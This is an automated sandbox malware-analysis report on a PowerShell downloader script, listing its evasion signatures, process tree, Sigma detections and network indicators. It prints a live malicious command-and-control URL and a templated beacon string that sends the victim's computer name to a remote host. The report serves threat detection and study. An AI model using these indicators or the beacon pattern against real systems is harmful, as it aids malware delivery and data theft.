Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1577863
MD5:96520d9bb837517f1891c6c4ed8a4274
SHA1:72adcc0aeb8f095262bc5c20b8c190e6b30f6f2e
SHA256:76f5fbdde4cf39aa96b9b88ba7925b04704dcaccfcff7742c5a2ea56cb49796f
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 2032 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2196, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2196, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2032, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527Avira URL Cloud: Label: malware
Source: http://cmacnnkfbhlcncm.topAvira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.7% probability
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.2323525434.0000016B4ED37000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2323525434.0000016B4ECB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb% source: powershell.exe, 00000000.00000002.2323525434.0000016B4ECB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb( source: powershell.exe, 00000000.00000002.2271390686.0000016B34882000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2271390686.0000016B34882000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089~ source: powershell.exe, 00000000.00000002.2323525434.0000016B4ED37000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2321582106.0000016B4EC3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.2323525434.0000016B4ED37000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

Networking

barindex
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$gnpdew7u5crmlb1/$bjsawurth3e4ngc.php?id=$env:computername&key=$qbxwcvhef&s=527
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37F44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
Source: powershell.exe, 00000000.00000002.2323525434.0000016B4ECB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros?
Source: svchost.exe, 0000000B.00000002.3426485462.0000028744400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3923C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39242000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38EDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B39231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38F15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3921A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3922F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2272509020.0000016B36A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2272509020.0000016B36A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000B.00000003.2406543142.00000287442E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000000.00000002.2272509020.0000016B36C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2272509020.0000016B3842A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/red-gift-box-42px.png
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/red-gift-box-42px.pngX
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024
Source: powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2272509020.0000016B3830E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://www.google.com/shopping/holiday100%3Fsource%3Dh100_2024.googleh
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B3832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34817E060_2_00007FFD34817E06
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34818BB20_2_00007FFD34818BB2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34810D130_2_00007FFD34810D13
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3480C8E50_2_00007FFD3480C8E5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3480C9550_2_00007FFD3480C955
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3480F1D30_2_00007FFD3480F1D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34A545210_2_00007FFD34A54521
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34AB2E6B0_2_00007FFD34AB2E6B
Source: powershell.exe, 00000000.00000002.2272509020.0000016B38A41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.2314021389.0000016B46C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46BF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2314021389.0000016B46D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2272509020.0000016B38359000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2Mz5SqgKiifxNCdmhKU-DaX7YInOhRM" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="4SNt4K_9HBU4WeZcG1rOcA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjAmq6AirKKAxUOyzgGHakuNqwQnIcBCAU"><img alt="" height="32" 